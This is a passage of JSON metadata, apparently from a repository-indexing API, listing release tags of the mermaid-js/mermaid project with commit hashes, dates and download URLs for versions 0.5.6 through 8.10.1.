@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.